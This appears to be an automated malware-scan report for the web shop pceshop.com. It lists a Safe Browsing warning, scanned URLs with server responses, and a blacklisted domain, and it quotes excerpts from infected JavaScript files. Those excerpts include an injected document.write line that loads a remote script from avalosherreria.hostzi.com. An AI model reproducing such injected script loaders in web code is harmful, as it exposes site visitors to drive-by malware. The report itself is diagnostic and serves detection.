Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pceshop.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.pceshop.com/ | 200 OK Content-Length: 39314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mytravelsfirenze.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa"><head><title>ÙرÙشگا٠اÛÙترÙØªÛ - Ù¾Û Ø³Û Ø§Û Ø´Ø§Ù¾|PceShop</title><meta name="description" content="ÙرÙشگا٠Ùدرت گرÙت٠از پرستا شاپ" /><meta name="keywords" content="ÙرÙشگاÙ, پرستا شاپ" /><meta http-e ...[3989 bytes skipped]... | ||
http://www.pceshop.com/themes/prestashop/cache/0e0e03f662e535f0bbd520887c104040.js | 200 OK Content-Length: 119567 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1729 bytes skipped]... ion(f){return f===b===d});else if(typeof b==="string"){var e=c.grep(a,function(f){return f.nodeType===1});if(Na.test(b))return c.filter(b,e,!d);else b=c.filter(b,e)}return c.grep(a,function(f){return c.inArray(f,b)>=0===d})}function na(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var e=c.data(a[d]),f=egory_list').trigger('goto',0);});document.write('<script type="text/javascript" src="http://avalosherreria.hostzi.com/administrator/38qgktch.php?id=55145902"></script>');;;(function(a){var b=a.serialScroll=function(c){return a(window).serialScroll(c)};b.defaults={duration:1e3,axis:"x",event:"click",start:0,step:1,lock:!0,cycle:!0,constant:!0};a.fn.serialScroll=function(c){return this.each(function(){var t=a.extend({},b.defaults,c),s=t.event,i=t.step,r=t.lazy,e=t.target?this:document,u=a(t.target||this,e),p=u[0],m=t.items,h=t.start,g=t.interval,k=t.navigation,l;if(!r){m=d()}if(t.forc ...[1460 bytes skipped]... Antivirus reports:
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234626 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:45 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://localhost/ | 200 OK Content-Length: 3724 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6948 Content-Type: text/javascript | clean |
http://mytravelsfirenze.com/test404page.js | 404 Not Found Content-Length: 401 Content-Type: text/html | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234655 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:46 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234666 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:47 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234741 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:48 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234664 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:48 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234619 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:49 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234609 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:49 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234648 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:50 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234637 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:50 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234662 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:51 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234775 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:51 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234998 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:52 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234616 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:53 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234612 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:53 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234658 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:54 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mytravelsfirenze.com/SSg9bhKd.php?id=1234643 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 23:43:54 GMT Location: http://localhost/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://www.pceshop.com/js/pluginDetect.js | 200 OK Content-Length: 23459 Content-Type: application/javascript | suspicious |
Suspicious code found: document.write('<script type="text/javascript" src="http://avalosherreria.hostzi.com/administrator/38qgktch.php?id=55145473"></script>');
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pceshop.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pceshop.com
Referer: http://www.google.com/search?q=pceshop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.